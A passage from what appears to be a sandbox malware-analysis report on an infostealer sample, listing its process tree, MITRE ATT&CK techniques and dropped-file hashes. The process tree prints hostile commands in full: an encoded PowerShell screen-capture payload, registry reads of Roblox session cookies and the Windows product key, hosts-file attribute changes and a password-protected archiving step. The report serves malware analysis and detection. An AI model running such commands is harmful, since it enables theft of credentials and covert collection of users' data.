AAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4460
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d3dbl1sq\d3dbl1sq.cmdline"
        5⤵
        
        PID:1620
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB4B9.tmp" "c:\Users\Admin\AppData\Local\Temp\d3dbl1sq\CSCB4135659E9544E8E87D6F1288A41171D.TMP"
        6⤵
        
        PID:2696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4816
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1224
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1764
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5008
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4360
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2848
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3312
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4520
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3688
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI13402\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\vLULI.zip" *"
    3⤵
    PID:1700
  - - C:\Users\Admin\AppData\Local\Temp\_MEI13402\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI13402\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\vLULI.zip" *
      4⤵
      Executes dropped EXE
      PID:3500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3952
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:1520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4972
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1552
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1348

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI13402\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_bz2.pyd

Filesize
46KB

MD5
93fe6d3a67b46370565db12a9969d776

SHA1
ff520df8c24ed8aa6567dd0141ef65c4ea00903b

SHA256
92ec61ca9ac5742e0848a6bbb9b6b4cda8e039e12ab0f17fb9342d082dde471b

SHA512
5c91b56198a8295086c61b4f4e9f16900a7ec43ca4b84e793bc8a3fc8676048cab576e936515bf2971318c7847f1314674b3336fe83b1734f9f70d09615519ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_ctypes.pyd

Filesize
56KB

MD5
813fc3981cae89a4f93bf7336d3dc5ef

SHA1
daff28bcd155a84e55d2603be07ca57e3934a0de

SHA256
4ac7fb7b354069e71ebf7fcc193c0f99af559010a0ad82a03b49a92deb0f4d06

SHA512
ce93f21b315d96fde96517a7e13f66aa840d4ad1c6e69e68389e235e43581ad543095582ebcb9d2c6dda11c17851b88f5b1ed1d59d354578fe27e7299bbea1cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_decimal.pyd

Filesize
103KB

MD5
f65d2fed5417feb5fa8c48f106e6caf7

SHA1
9260b1535bb811183c9789c23ddd684a9425ffaa

SHA256
574fe8e01054a5ba07950e41f37e9cf0aea753f20fe1a31f58e19202d1f641d8

SHA512
030502fa4895e0d82c8cce00e78831fc3b2e6d956c8cc3b9fb5e50cb23ef07cd6942949a9f16d02da6908523d9d4ef5f722fb1336d4a80cd944c9f0cb11239ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_hashlib.pyd

Filesize
33KB

MD5
4ae75c47dbdebaa16a596f31b27abd9e

SHA1
a11f963139c715921dedd24bc957ab6d14788c34

SHA256
2308ee238cc849b1110018b211b149d607bf447f4e4c1e61449049eab0cf513d

SHA512
e908fecb52268fac71933e2fdb96e539bdebe4675dfb50065aee26727bac53e07cca862193bcb3ab72d2ae62d660113a47e73e1e16db401480e4d3fd34d54fa8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_lzma.pyd

Filesize
84KB

MD5
6f810f46f308f7c6ccddca45d8f50039

SHA1
6ee24ff6d1c95ba67e1275bb82b9d539a7f56cea

SHA256
39497259b87038e86c53e7a39a0b5bbbfcebe00b2f045a148041300b31f33b76

SHA512
c692367a26415016e05ebe828309d3ffec290c6d2fd8cc7419d529a51b0beda00ccdc327c9f187ae3ca0cc96336d23d84a8ff95b729c8958b14fb91b6da9e878

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_queue.pyd

Filesize
24KB

MD5
0e7612fc1a1fad5a829d4e25cfa87c4f

SHA1
3db2d6274ce3dbe3dbb00d799963df8c3046a1d6

SHA256
9f6965eb89bbf60df0c51ef0750bbd0655675110d6c42eca0274d109bd9f18a8

SHA512
52c57996385b9a573e3105efa09fd6fd24561589b032ef2b2ee60a717f4b33713c35989f2265669f980646d673e3c387b30b9fc98033bb8ca7c59ece1c17e517

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_socket.pyd

Filesize
41KB

MD5
7a31bc84c0385590e5a01c4cbe3865c3

SHA1
77c4121abe6e134660575d9015308e4b76c69d7c

SHA256
5614017765322b81cc57d841b3a63cbdc88678ff605e5d4c8fdbbf8f0ac00f36

SHA512
b80cd51e395a3ce6f345b69243d8fc6c46e2e3828bd0a7e63673a508d889a9905d562cac29f1ed394ccfcda72f2f2e22f675963dd96261c19683b06dea0a0882

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_sqlite3.pyd

Filesize
48KB

MD5
bb4aa2d11444900c549e201eb1a4cdd6

SHA1
ca3bb6fc64d66deaddd804038ea98002d254c50e

SHA256
f44d80ab16c27ca65da23ae5fda17eb842065f3e956f10126322b2ea3ecdf43f

SHA512
cd3c5704e5d99980109fdc505d39ad5b26a951685e9d8e3fed9e0848cd44e24cc4611669dbdb58acc20f1f4a5c37d5e01d9d965cf6fe74f94da1b29aa2ff6931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-console-l1-1-0.dll

Filesize
13KB

MD5
87bbe6baf9189f316e6e2b0593c3e74c

SHA1
ea94b3abf698b196cf04746f72a4534e4096662f

SHA256
952b8979e9a111ec218af310ecf41a61b9dbb464a7a557106afd25b87d527f2f

SHA512
f7eb7dae2f5515b1d54969a303b5d0b3f1f21b14a97405cd1181803e3b0a1b67b2a8b95adab537c55c0115b1aadc53343a6e717c5f72380b4249286aff1a3aa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-datetime-l1-1-0.dll

Filesize
13KB

MD5
818d20a68f11c702e119c053995c0fe4

SHA1
5f8c665d690616c6f681c55d9e9a64c55f92edff

SHA256
21e69019fdedefef1274572f49f3e59593c986764719b2d66a65fa1f59a6e2a7

SHA512
d7747e9948fad40c602dbf4b72cec95c038bf52d1698de85d47fc2bb198e954dde0d1586020e01630eed9d3630c8576483a44a2592dccc5fd6cce124c25123c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-debug-l1-1-0.dll

Filesize
13KB

MD5
9a3859df7ccb0aecf0c0fc2d86afa114

SHA1
2a2be47b142776cbd690e8b287640389b02cefd0

SHA256
d24a9814b327b0cdeefd6876f7aca219df5a9f6fedfa9c36e1e35210de40f5e7

SHA512
7a22b04958bb50c6785ca7998e652ec58f0f6c667a1cacd5ba46c40ac97248e0badad4a48b4a5644785b3d7fc8697c84208279d0566b93b7486eef7403a9c27b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
13KB

MD5
004fdf301df9c351359f1f6fbd739de6

SHA1
ca0d32923123e19f5276b3c9db424802af4871aa

SHA256
724985688873376e3d8d0c2f159ea21cfa5d1bc3436d4581a0cff31be95c2af6

SHA512
0105a4eb20f318841e78626290406135cb581d3af7786771701238b1d24a997fbba8a2072d67582987aacb73ac0fd6987c1b7462150e0ea1627697ace85baa62

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-file-l1-1-0.dll

Filesize
16KB

MD5
8f9a25fd913ad00407dba18d45f84b2e

SHA1
8f8d7a9269a00146d6a6d47f9ae21400067293ed

SHA256
67c20c8f716246d9f0c5f7193224aec08da4350f817b6c6f03e912e8cb139cd7

SHA512
7a493173c9ba842cc5cdb9ef1839d56d8553e885cd85ce8137fac1dc5b0a07bdc711b4e4b8368ebb90032496b9c3a0ee7de5bbfd69e8ad86be6a2fb7b10b83c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-file-l1-2-0.dll

Filesize
13KB

MD5
247ee82b6f9ab67feb2ac829c7e0534e

SHA1
8662074bc30819a42981960382d30d3dcd43bc78

SHA256
066a17e9a9fad448441ef8accd5d6a9d226dd433f9b55c35054777f680af0eea

SHA512
d4caee2ada6acd68d90e710604ea49bd20ae755e45dc5c0d2037656df86daa74919a4cd9f5869051d719e7d1c8ee186b0b369f54af929fefb3a459b2161dc5b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-file-l2-1-0.dll

Filesize
13KB

MD5
67956edcc260ce954901db15bed0ac74

SHA1
3c7fc4c623d5e08df7d551a7741a2bc860a3a0c7

SHA256
6ee5661eabf1a76e09763a1cd08de96bf63de5ccffde2909df3ed3c046bd02bf

SHA512
540b0ad62f72d8f24dee755ba05623940ef06a0550d46eb927b88f70a8cdfb6fd17355dcb71453c1f54f376aa077b1911a645401df8cf57fb273dff858cba6ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-handle-l1-1-0.dll

Filesize
13KB

MD5
f4f1f9b378229e55f98defae9dd145cd

SHA1
49cd7133fbdd06c01a550e608ae0733e34aa0a04

SHA256
0302f85cbcc1be70c5a8ea849c06ea43e60e3cc57d7d3faac04a983c277e5a2b

SHA512
8d0cf3f3d45fda0dc3a5cbf1b4254419a5a2a487e1913aa07795a1cc4b47b9ff287e1b87ab98b43cdc0781468585d5465d0a216576af2a0e103417a202a34d75

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-heap-l1-1-0.dll

Filesize
13KB

MD5
8c893c818062eeab65070ef1482ccf8f

SHA1
200a73fa8f9db3abb55b8688ce800878b4aa5a22

SHA256
27778dc69a3f7c25458c531c60b70abb83f94f90d9380345bad0ee378767577f

SHA512
2f23d9bc24029641196170961bb64aec59e22e8d82f1d283ff41147aa61b66d2c9f76c225d0b3a42923ea9a68370e3726d8af370a1c50a36d8ee08ef7acfe9a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
13KB

MD5
31e96fcd2cf753550ff7e8a8cd2fd361

SHA1
a7941e75403a7bf8c81497d0ba75e304068ab7f1

SHA256
b093fe2a75007c684d49aaec1715036b5f12e136ad4cb8087b00a01787afbb5c

SHA512
bcc05c24e0db5fa4ddf9ead93d415005fbc3ccc3a79a8817a27e00b9a4c95acf7e36aabb3c40186d323335c694fa30c26c92b74da6211f2ed9359768b76ea9a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
14KB

MD5
0b5fbfed28ebeb4583876dae0171bae6

SHA1
565f7d29c7e62e2ef8407d7dfd47d0aaa19ae8a9

SHA256
467f0d646cd1b16818aaddd32d0e88eddf21f7cc59afce81593a5204a5cf55a9

SHA512
219fdc79e5db01c5fbd23a65e255f3848e1593d6c0a8326cdd80264fba122008223af31a8cbf87bfe5c6aa6ef34b32b580e2756d9abae7d2cd941792777a9603

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-localization-l1-2-0.dll

Filesize
15KB

MD5
c13e60a1d00f72a47a902a2f28b379db

SHA1
77cc4a283f37eff77298bf36eefcd2c38b936fe7

SHA256
f5eb944c34481f25d9fba56801f26b75c529969593c29a11094c3cd770b12cae

SHA512
95450b3bec4435135e350ded86ccf64b7f7b0e20e19234e0cc9cbf3483c836251bcaa7d0cc3ef1749c021ef8e5420e35809b7de64df4fa4293cca14dfcfd89e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-memory-l1-1-0.dll

Filesize
13KB

MD5
d187f38bc30661a530863c88cdd590d5

SHA1
e740cf4fa1e2cac6f9a0fd8e145efd2ce9ac0432

SHA256
6a39983183760e9fc35a81e2ba3cff10f65734ac7349ee29e1da816299c1ffc9

SHA512
2079a3869c0a26d3cd898b413aa57e19fb68a63a96f03fd8899e8c5202e01be909bed1954e9e756275ec338b0efc6acbb4cfe292a1cde298d9a5dfd0b987a012

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
13KB

MD5
c67bc195a9c6e9d57088cae884d003aa

SHA1
077ef3be8430ace645158416d16b654a4a6a130e

SHA256
26c36f34f128353ce5ec2f18e1d9db4a1eeeb22016700beaaddeb4298c7da0c1

SHA512
b55826f1c1f152e4cef8576e14092d84c30c18bcd69d2475b1bf6a697c0014745c465784eb69e68a51399018a3903bef5f3852374d87045a2f56db5101f67501

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
14KB

MD5
2223307226452472fffaae1b1c2438f6

SHA1
b68fe367388efe1743f02fdf08e284a986c1fddb

SHA256
8b83278fced951da58726fbf22346bc1be2f9c73b5d1da6c38d7f28cc68e94a6

SHA512
c1709ca4251cfa88ffc7f069970e0c3d4533a38e4745933cb962d5bf3b2e400f7ec08aacb9f1afe9ee6f76625845946de2e1a45ff3524ad2de598cd1d74195ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
15KB

MD5
d0d27dfd897454b6a8db4fddb4e95b7e

SHA1
c1f55805543bab073c432b4010e5470b9f96a15e

SHA256
7b9754c0e2b5e6e68d504e970e17293a09b7bf8a80c16d261f415671ea58ad8b

SHA512
dba51bff77ec0aed92ba8e139b45200c044ae6cd8c3c7260ee814cade35e463a7dd3f700fee81f66acd2cb4cbba74be58f383ca7c6150e5901876094c6a35f2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
13KB

MD5
28a3d552a0e07c03bdc46a0096b7ce55

SHA1
37be150c9e8a94360c8b4c8f905f322c9b56394c

SHA256
4561f63773881756e20562e65ff49bad7239a638d5153773e106117d3a78d049

SHA512
84191ad57a2926311b029984538060004323372ffb91a385a8c72f34f44045731c42f2f9581d1041555ca35a100313ec938fbca18487a44b3b58e7b39bd993dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-profile-l1-1-0.dll

Filesize
12KB

MD5
165429df8739608ad4a0d58dc4bf8b9a

SHA1
d6fdbc870356ed87f2fcc52424535f9d5dfd0197

SHA256
31a05fc79fb6ffd1301fd233a430e2e5d2e26d2ae528546126e40e683205485e

SHA512
75a53cc4fb4a6c767ee9f00e4984c8ef833ae33e31de4159b1be7f3611ea918708f366b10741668e582c6072ada672355d8df1c1f7c6252109ea32727af1cfc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-rtlsupport-l1-1-0.dll

Filesize
13KB

MD5
23d2d1e9be4b84b122ecb4e989550c6e

SHA1
9909474abfd546986ce4769e5031acd6b2bf2d65

SHA256
4e793eb195fa51b1fa1c0fe3f557d2ab45bb375ae4a1d4fa1c7223dda7db4675

SHA512
1ddc246344bc3cc4294c92c9d62aaf4e6ec64adcc0422ad095788db200b0a8b754f547963561ad66e2661de1a1760711ec2eb351d13f1422671fe375fded8f05

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-string-l1-1-0.dll

Filesize
13KB

MD5
f40694992cd2b115d5257cd1f893e3df

SHA1
b6e707bb8b3abcf96216e00a32eace436e62e4c9

SHA256
ea84b4d43512119445a145a07a2815ff366f32cb2ce515d0fc556f4ec445a1f0

SHA512
